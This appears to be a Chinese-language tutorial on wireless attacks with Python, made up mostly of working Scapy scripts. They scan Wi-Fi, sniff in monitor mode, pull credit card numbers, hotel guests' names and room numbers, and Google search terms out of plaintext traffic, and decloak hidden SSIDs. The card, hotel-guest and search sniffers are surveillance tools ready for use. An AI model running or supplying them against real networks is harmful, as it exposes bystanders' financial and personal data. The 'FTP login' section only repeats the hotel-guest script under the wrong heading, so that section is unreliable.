使用Python进行无线网络攻击
PyWiFi 模块寻找 Wi-Fi 来源
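# -*- coding: UTF-8 -*-
import time

import pywifi

# pywifi's scan() only triggers a scan and returns immediately; the results
# are populated a few seconds later, so wait before reading them.
SCAN_WAIT_SECONDS = 5


def bies():
    """Scan with the first wireless interface and print each network's SSID and signal.

    Prints a message and returns when no wireless interface is present,
    instead of failing on the ``[0]`` index.
    """
    wifi = pywifi.PyWiFi()  # create the wireless handle
    interfaces = wifi.interfaces()
    if not interfaces:
        print("No wireless interface found")
        return

    iface = interfaces[0]  # use the first wireless card
    iface.scan()
    time.sleep(SCAN_WAIT_SECONDS)

    for network in iface.scan_results():
        print(network.ssid, network.signal)


bies()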
Wi-Fi 侦听模块
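import os

from scapy.all import *

iface = "en0"
IWCONFIG = "/usr/sbin/iwconfig"

# Switch the card to monitor mode. The exit status of iwconfig is not
# checked, so a failure here goes unnoticed and the loop below still runs.
os.system(IWCONFIG + " " + iface + " mode monitor")


def dump_packet(pkt):
    """Print a summary of every frame that is not a beacon or probe request/response.

    When the frame carries a Raw layer, its payload is hex-dumped as well.
    """
    skipped_layers = (Dot11Beacon, Dot11ProbeReq, Dot11ProbeResp)
    if any(pkt.haslayer(layer) for layer in skipped_layers):
        return

    print(pkt.summary())
    if pkt.haslayer(Raw):
        # hexdump() prints the dump itself and returns None; wrapping it in
        # print() emitted a stray "None" line after every dump.
        hexdump(pkt.load)
    print("\n")


# Hop through channels 1-13, capturing at most 10 frames or 3 seconds on each.
while True:
    for channel in range(1, 14):
        os.system(IWCONFIG + " " + iface + " channel " + str(channel))
        print("Sniffing on channel " + str(channel))
        sniff(iface=iface, prn=dump_packet, count=10, timeout=3, store=0)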
用Scapy测试无线网卡的嗅探功能
测试嗅探无线网络的代码
#!/usr/bin/python
#coding=utf-8
from scapy.all import *

# Checked in this order; the first layer found in a packet decides the message.
_LAYER_MESSAGES = (
    (Dot11Beacon, '[+] Detected 802.11 Beacon Frame'),
    (Dot11ProbeReq, '[+] Detected 802.11 Probe Request Frame'),
    (TCP, '[+] Detected a TCP Packet'),
    (DNS, '[+] Detected a DNS Packet'),
)


def pktPrint(pkt):
    """Print one line naming the first recognised layer in *pkt*, if any.

    Used only to confirm that the monitor-mode interface delivers frames;
    packets with none of the listed layers produce no output.
    """
    for layer, message in _LAYER_MESSAGES:
        if pkt.haslayer(layer):
            print(message)
            return


conf.iface = 'wlan0mon'
sniff(prn=pktPrint)
使用Python正则表达式嗅探信用卡信息
3种常用的信用卡:Visa、MasterCard和American Express。
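#!/usr/bin/python
#coding=utf-8
import re

# American Express numbers are 15 digits starting with 34 or 37. The
# lookarounds stop the pattern from matching inside a longer run of digits,
# which the bare '3[47][0-9]{13}' did.
_AMEX_RE = re.compile(r'(?<![0-9])3[47][0-9]{13}(?![0-9])')


def findCreditCard(raw):
    """Print the first American Express-shaped number found in *raw*.

    This is a format match only: no checksum is verified, so any 15-digit
    string with a 34/37 prefix is reported. Nothing is printed when there
    is no match.
    """
    matches = _AMEX_RE.findall(raw)
    if matches:
        # Single-argument print() behaves the same on Python 2 and 3.
        print('[+] Found American Express Card: ' + matches[0])


def main():
    """Run the matcher over two sample strings (one without and one with a card number)."""
    tests = [
        'I would like to buy 1337 copies of that dvd',
        # The stray backslash before "$" was an invalid escape sequence.
        'Bill my card: 378282246310005 for $2600',
    ]
    for test in tests:
        findCreditCard(test)


if __name__ == '__main__':
    main()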
接着就加入Scapy来嗅探TCP数据包实现嗅探功能:
#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *

# (message prefix, pattern) pairs, evaluated in this order for every packet.
_CARD_PATTERNS = (
    # American Express: 15 digits beginning with 34 or 37
    ('[+] Found American Express Card: ', '3[47][0-9]{13}'),
    # MasterCard: 16 digits beginning with 51-55
    ('[+] Found MasterCard Card: ', '5[1-5][0-9]{14}'),
    # Visa: begins with 4, 13 or 16 digits long
    ('[+] Found Visa Card: ', '4[0-9]{12}(?:[0-9]{3})?'),
)


def findCreditCard(pkt):
    """Report the first match of each card-number pattern in the packet's Raw payload.

    The patterns are plain digit-shape matches with no checksum, so any
    digit run of the right form is reported. A number can only match when
    it appears in the payload in the clear; payloads protected by transport
    encryption do not contain it in readable form.
    """
    payload = pkt.sprintf('%Raw.load%')
    for prefix, pattern in _CARD_PATTERNS:
        hits = re.findall(pattern, payload)
        if hits:
            print(prefix + hits[0])


def main():
    """Parse ``-i <interface>`` and run the capture on TCP traffic until Ctrl-C."""
    parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i')
    parser.add_option('-i', dest='interface', type='string',
                      help='specify interface to listen on')
    options, _args = parser.parse_args()

    # No interface given: show the usage line and stop.
    if options.interface is None:
        print(parser.usage)
        exit(0)

    conf.iface = options.interface
    try:
        print('[*] Starting Credit Card Sniffer.')
        # store=0: packets are handed to the callback and not kept in memory
        sniff(filter='tcp', prn=findCreditCard, store=0)
    except KeyboardInterrupt:
        exit(0)


if __name__ == '__main__':
    main()
嗅探宾馆住客
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

# NOTE(review): `re` is used below but never imported in this script; it
# presumably arrives through the wildcard import above - confirm.


def findGuest(pkt):
    """Print the LAST_NAME / ROOM_NUMBER values found in the packet's Raw payload.

    The two fields are matched as literal text in the payload, so they are
    only found when the request that carries them is sent unencrypted.
    ``rooms[0]`` is read whenever a last name matched, even if no room
    number was found in the same payload.
    """
    payload = pkt.sprintf('%Raw.load%')
    surnames = re.findall('(?i)LAST_NAME=(.*)&', payload)
    rooms = re.findall("(?i)ROOM_NUMBER=(.*)'", payload)
    if not surnames:
        return
    print('[+] Found Hotel Guest ' + str(surnames[0]) + ', Room #' + str(rooms[0]))


def main():
    """Parse ``-i <interface>`` and run the capture on TCP traffic until Ctrl-C."""
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i')
    parser.add_option('-i', dest='interface', type='string',
                      help='specify interface to listen on')
    options, _args = parser.parse_args()

    # No interface given: show the usage line and stop.
    if options.interface is None:
        print(parser.usage)
        exit(0)

    conf.iface = options.interface
    try:
        print('[*] Starting Hotel Guest Sniffer.')
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)


if __name__ == '__main__':
    main()
编写谷歌键盘记录器:
Google搜索的URL中,参数“q=”之后是要搜索的字符串,并以“&”终止;参数“pq=”之后是上一次搜索的内容。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

# NOTE(review): `re` is used below but never imported in this script; it
# presumably arrives through the wildcard import above - confirm.


def findGoogle(pkt):
    """Print the ``q=`` search term from a GET request whose payload mentions google.

    The capture filter used by main() is ``tcp port 80``, so only plaintext
    HTTP requests are inspected; a query sent over HTTPS is neither matched
    by that filter nor readable in the payload.
    """
    if not pkt.haslayer(Raw):
        return
    payload = pkt.getlayer(Raw).load
    if 'GET' not in payload or 'google' not in payload:
        return

    found = re.findall(r'(?i)\&q=(.*?)\&', payload)
    if not found:
        return

    # Keep the text up to the next '&', then undo the URL encoding of spaces.
    term = found[0].split('&')[0]
    term = term.replace('q=', '').replace('+', ' ').replace('%20', ' ')
    print('[+] Searched For: ' + term)


def main():
    """Parse ``-i <interface>`` and run the capture on port-80 traffic until Ctrl-C."""
    parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i')
    parser.add_option('-i', dest='interface', type='string',
                      help='specify interface to listen on')
    options, _args = parser.parse_args()

    # No interface given: show the usage line and stop.
    if options.interface is None:
        print(parser.usage)
        exit(0)

    conf.iface = options.interface
    try:
        print('[*] Starting Google Sniffer.')
        sniff(filter='tcp port 80', prn=findGoogle)
    except KeyboardInterrupt:
        exit(0)


if __name__ == '__main__':
    main()
嗅探FTP登录口令:(注:下方代码与上文“嗅探宾馆住客”的脚本完全相同,并不包含任何FTP相关的逻辑。)
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *

# NOTE(review): the heading above this listing mentions FTP logins, but the
# code is the hotel-guest script (see its usage string and messages); it
# contains no FTP handling.
# NOTE(review): `re` is used below but never imported in this script; it
# presumably arrives through the wildcard import above - confirm.


def findGuest(pkt):
    """Print the LAST_NAME / ROOM_NUMBER values found in the packet's Raw payload.

    Both fields are matched as literal text, so they are only found when
    the payload is unencrypted. The room list is indexed whenever a last
    name matched, even if no room number was found.
    """
    text = pkt.sprintf('%Raw.load%')
    last_names = re.findall('(?i)LAST_NAME=(.*)&', text)
    room_numbers = re.findall("(?i)ROOM_NUMBER=(.*)'", text)
    if not last_names:
        return
    print('[+] Found Hotel Guest ' + str(last_names[0]) + ', Room #' + str(room_numbers[0]))


def main():
    """Parse ``-i <interface>`` and run the capture on TCP traffic until Ctrl-C."""
    parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i')
    parser.add_option('-i', dest='interface', type='string',
                      help='specify interface to listen on')
    options, _unused = parser.parse_args()

    # No interface given: show the usage line and stop.
    if options.interface is None:
        print(parser.usage)
        exit(0)

    conf.iface = options.interface
    try:
        print('[*] Starting Hotel Guest Sniffer.')
        sniff(filter='tcp', prn=findGuest, store=0)
    except KeyboardInterrupt:
        exit(0)


if __name__ == '__main__':
    main()
侦听无线 802.11 Probe请求
#!/usr/bin/python
#utf-8
from scapy.all import *

interface = 'wlan0mon'
# Network names already reported, so each one is printed only once.
probeReqs = []


def sniffProbe(p):
    """Print the network name from a probe request the first time it is seen.

    The name is taken from the ``info`` field of the Dot11ProbeReq layer;
    frames without that layer, and names already in ``probeReqs``, are
    ignored.
    """
    if not p.haslayer(Dot11ProbeReq):
        return
    requested = p.getlayer(Dot11ProbeReq).info
    if requested in probeReqs:
        return
    probeReqs.append(requested)
    print('[+] Detected New Probe Request: ' + requested)


sniff(iface=interface, prn=sniffProbe)
寻找隐藏网络的802.11信标
def sniffDot11(p):
    """Record and print the sender MAC of any beacon whose SSID field is empty.

    Each MAC is reported once; ``hiddenNets`` (defined outside this
    function) holds the addresses already seen.
    """
    if not p.haslayer(Dot11Beacon):
        return
    if p.getlayer(Dot11Beacon).info != '':
        return
    sender_mac = p.getlayer(Dot11).addr2
    if sender_mac in hiddenNets:
        return
    print('[-] Detected Hidden SSID: with MAC:' + sender_mac)
    hiddenNets.append(sender_mac)
找出隐藏的802.11网络的网络名
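#!/usr/bin/python
#coding=utf-8
import sys
# The packet classes and sniff() live in scapy.all; a wildcard import from
# the bare `scapy` package does not bring Dot11ProbeResp, Dot11Beacon,
# Dot11 or sniff into scope.
from scapy.all import *

interface = 'wlan0mon'
# Sender MACs seen beaconing with an empty SSID field.
hiddenNets = []
# Subset of hiddenNets whose network name has already been printed.
unhiddenNets = []


def sniffDot11(p):
    """Track empty-SSID beacons and print the name once a probe response reveals it.

    A beacon with an empty ``info`` field adds its sender MAC to
    ``hiddenNets``. A later probe response from a MAC in that list carries
    the network name in its own ``info`` field; it is printed once and the
    MAC is moved to ``unhiddenNets``. Suppressing the SSID in beacons
    therefore does not keep the name confidential.
    """
    if p.haslayer(Dot11ProbeResp):
        addr2 = p.getlayer(Dot11).addr2
        # Logical `and` instead of bitwise `&` on two booleans.
        if addr2 in hiddenNets and addr2 not in unhiddenNets:
            netName = p.getlayer(Dot11ProbeResp).info
            print('[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2)
            unhiddenNets.append(addr2)

    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == '':
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hiddenNets:
                print('[-] Detected Hidden SSID: with MAC:' + addr2)
                hiddenNets.append(addr2)


sniff(iface=interface, prn=sniffDot11)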